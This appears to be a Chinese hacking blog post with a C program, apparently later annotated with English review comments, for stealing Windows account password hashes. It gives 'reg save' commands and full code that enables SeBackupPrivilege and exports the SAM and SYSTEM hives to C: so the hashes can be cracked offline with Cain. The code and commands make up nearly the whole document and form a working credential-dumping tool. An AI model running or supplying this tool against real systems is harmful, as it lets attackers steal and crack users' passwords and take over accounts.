获得系统Hash

Pwdump得hash很不稳定,不稳定啊不稳定。有个方法得hash很方便:

rem Must run from an elevated (Administrators) prompt: exporting SAM needs SeBackupPrivilege.
reg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive
rem Both files contain the machine's account password hashes; delete them once you are done with them.

然后在Cain的Cracker中导入这两个文件就可以破hash了。虽然这个方法很好用,不过reg save需要Administrators的权限(导出SAM要用到SeBackupPrivilege)。可以写成批处理,哥直接跑程序。注意导出的hive文件里就是系统账户的口令哈希,用完记得删掉。

#include <stdio.h>
#include <windows.h>

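/*
 * Enable SeBackupPrivilege on the current process token.
 *
 * Returns TRUE when the privilege is enabled, FALSE otherwise (a message
 * naming the failing step and its Win32 error code is printed).
 *
 * Note that AdjustTokenPrivileges() returns TRUE even when the token does
 * not hold the requested privilege at all (e.g. a non-admin caller); that
 * case is only visible through GetLastError() == ERROR_NOT_ALL_ASSIGNED,
 * which the original code did not check.
 */
static BOOL enable_backup_privilege(void)
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tkp;
    BOOL ok = FALSE;

    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        printf("OpenProcessToken failed: %lu\n", GetLastError());
        return FALSE;
    }

    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if (!LookupPrivilegeValue(NULL, SE_BACKUP_NAME, &tkp.Privileges[0].Luid)) {
        printf("LookupPrivilegeValue failed: %lu\n", GetLastError());
    } else if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL)) {
        printf("AdjustTokenPrivileges failed: %lu\n", GetLastError());
    } else if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
        /* Success return but the privilege is not in the token: the caller
         * is not running as Administrators / elevated. */
        printf("SeBackupPrivilege not held by this token (need Administrators)\n");
    } else {
        ok = TRUE;
    }

    /* The token handle is no longer needed once the privilege is adjusted. */
    CloseHandle(hToken);
    return ok;
}

/*
 * Export the HKLM subkey `subkey` to the hive file `path` with RegSaveKeyEx.
 *
 * Requires SeBackupPrivilege to already be enabled (enable_backup_privilege).
 * Returns ERROR_SUCCESS, or the Win32 error code of the failing call after
 * printing a message naming it. The key handle is always closed.
 *
 * RegSaveKeyEx fails with ERROR_ALREADY_EXISTS if `path` already exists, so
 * a stale output file from an earlier run must be removed first.
 */
static LONG save_hive(const char *subkey, const char *path)
{
    HKEY hKey = NULL;
    LONG rc;

    /* KEY_READ instead of KEY_ALL_ACCESS: the save itself relies on
     * SeBackupPrivilege rather than on write rights to the key, so request
     * the minimum. The return code (not the uninitialized handle) decides
     * success; the original compared a never-written hKey against NULL.
     * NOTE(review): the default ACL on HKLM\SAM may still refuse the open
     * for Administrators; if so it is now reported as ERROR_ACCESS_DENIED
     * rather than passed on to RegSaveKeyEx as an invalid handle. */
    rc = RegOpenKeyEx(HKEY_LOCAL_MACHINE, subkey, 0, KEY_READ, &hKey);
    if (rc != ERROR_SUCCESS) {
        printf("RegOpenKeyEx(%s) failed: %ld\n", subkey, rc);
        return rc;
    }

    rc = RegSaveKeyEx(hKey, path, NULL, REG_STANDARD_FORMAT);
    if (rc != ERROR_SUCCESS) {
        printf("RegSaveKeyEx(%s -> %s) failed: %ld\n", subkey, path, rc);
    }

    /* Close every opened key; the original reused one variable and closed
     * only the last handle. */
    RegCloseKey(hKey);
    return rc;
}

/*
 * Dump the SAM and SYSTEM hives to c:\sam.hive and c:\system.hive so the
 * password hashes can be fed to an offline cracker.
 *
 * Returns 0 when both hives were written, 1 on any failure (the original
 * returned 0 on every path, so callers/batch files could not tell).
 *
 * Security note: the output files hold the machine's account hashes and are
 * written to the root of C:, where they inherit that directory's ACL. Move
 * or delete them as soon as they have been used. The SECURITY hive (LSA
 * secrets / cached credentials) is deliberately not exported here; the
 * original declared a key name for it but never used it.
 */
int main(void)
{
    int rc = 1;

    printf("=================================================\n");
    printf("By:乱雪\n");
    printf("Blog:hi.baidu.com/lu4nx\n");
    printf("说明:C盘目录下生成sam.hive和system.hive两个文件,直接用Cain跑密码\n");
    printf("注意:需要Administrator权限\n");
    printf("=================================================\n");

    /* Adjust the token first: RegSaveKeyEx needs SE_BACKUP_NAME enabled. */
    if (!enable_backup_privilege()) {
        return rc;
    }

    /* SYSTEM is required alongside SAM because it holds the boot key that
     * decrypts the hashes in SAM; stop at the first failure. */
    if (save_hive("SAM", "c:\\sam.hive") == ERROR_SUCCESS &&
        save_hive("SYSTEM", "c:\\system.hive") == ERROR_SUCCESS) {
        rc = 0;
    }

    return rc;
}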